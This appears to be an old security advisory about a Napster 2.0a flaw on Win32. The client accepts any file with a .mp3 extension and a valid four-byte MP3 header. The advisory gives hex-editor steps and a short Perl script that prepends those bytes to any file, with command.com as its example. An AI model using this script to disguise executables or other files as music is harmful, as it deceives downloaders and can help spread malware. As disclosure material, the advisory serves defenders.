COMMAND

    Napster

SYSTEMS AFFECTED

    Win32

PROBLEM

    Jason  Copenhaver  found  following.   This  advisory  explains  a
    pretty simple  way into  fooling napster  into thinking  that your
    transfering an  mp3 file.   It looks  like it  only checks  for  a
    valid 4 byte mp3 header and the mp3 file extenstion... (by Divert)
    You need:

        - a valid .mp3 file
        - your favorite hex editor
        - only tested on napster 2.0a build 1318

    Open up a valid .mp3 file  into your favorite hex editor and  just
    copy the first four bytes then paste those onto any file you want.
    Make sure the  file has a  .mp3 extension and  poof napster thinks
    your sending an mp3.  The first four bytes of an mp3 file our just
    the header listing various information about the mp3, the bit info
    can be found at

        http://heuss.techfak.uni-bielefeld.de/www/lboeck/WWWSeminarSS99/header.htm

    the site is in german.. but just send it through the babel fish at
    altavista.

    'Narrow' added following code:

        #!/usr/bin/perl
        ####################################################
        # Fooling Napster Script By Narrow 2000.
        #
        # Usage: nap.pl <file>
        #
        # Example: perl nap.pl command.com
        # Now it will generate a file called command.com.mp3
        #
        # NOTE: This script only adds these 4 bytes!
        
        $bytes = "\xFF\xFB\x90\x44";
        $file = $ARGV[0];
        
        print "Fooling Napster Script By Narrow\n";
        if(!$ARGV[0]) {
	        print "\nUsage: nap.pl <file>\n";
	        exit;
        }
        
        open(LOAD, "<$file") || die "open: $!\n";
        binmode(LOAD);
        
        open(SAVE, ">$file.mp3") || die "open: $!\n";
        binmode(SAVE);
        print SAVE $bytes;
        while(<LOAD>) { print SAVE; }
        close LOAD;
        close SAVE;

SOLUTION

    Nothing yet.